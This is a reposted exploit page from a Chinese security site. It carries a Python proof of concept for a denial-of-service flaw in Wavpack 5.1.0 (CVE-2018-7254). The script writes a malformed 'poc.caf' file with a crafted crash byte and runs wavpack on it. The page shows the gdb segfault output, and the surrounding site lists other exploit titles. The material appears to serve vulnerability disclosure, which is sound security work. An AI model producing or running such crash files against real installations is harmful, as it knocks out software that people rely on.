首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wavpack 5.1.0 - Denial of Service
来源:https://github.com/r4xis 作者:r4xis 发布时间:2018-02-26  

# Exploit title: Wavpack 5.1.0 - Denial of Service
# Date: 20.02.2018
# Exploit Author: r4xis
# https://github.com/r4xis
#
# Vendor Homepage:  http://www.wavpack.com/
# Software Links:   http://www.wavpack.com/downloads.html
#                   https://github.com/dbry/WavPack
#
#
# Version: Wavpack 5.1.0
# Tested on:    Debian 9.3.0 64 bit
#               Windows 7 32 bit and 64 bit
#               Windows 8 64 bit
#
#
# CVE: CVE-2018-7254
# CVE Details:
# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
# https://github.com/dbry/WavPack/issues/26


import os

head = "\x63\x61\x66\x66"
version = "\x00\x01"
junk1 = "\x00"*(0xa0-6)
crash = "\x80"
junk2 = "\x00"*100

f=open("poc.caf", 'w')
f.write(head+version+junk1+crash+junk2)
f.close()

os.system("wavpack poc.caf")

'''
Debian gdb output:
Program received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms ()
    at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
333 ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
'''


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Internet Explorer 11
·UserSpice 4.3 - Blind SQL Inje
·Microsoft Windows Kernel - 'nt
·AsusWRT LAN Unauthenticated Re
·Siemens SIPROTEC 4 and SIPROTE
·CloudMe Sync 1.10.9 Buffer Ove
·JBoss Remoting 6.14.18 - Denia
·Disk Savvy Enterprise 10.4.18
·Chrome V8 - 'Runtime_RegExpRep
·Microsoft Edge Chakra JIT Call
·Microsoft Edge Chakra JIT - 'L
·Chrome V8 TranslatedState::Mat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved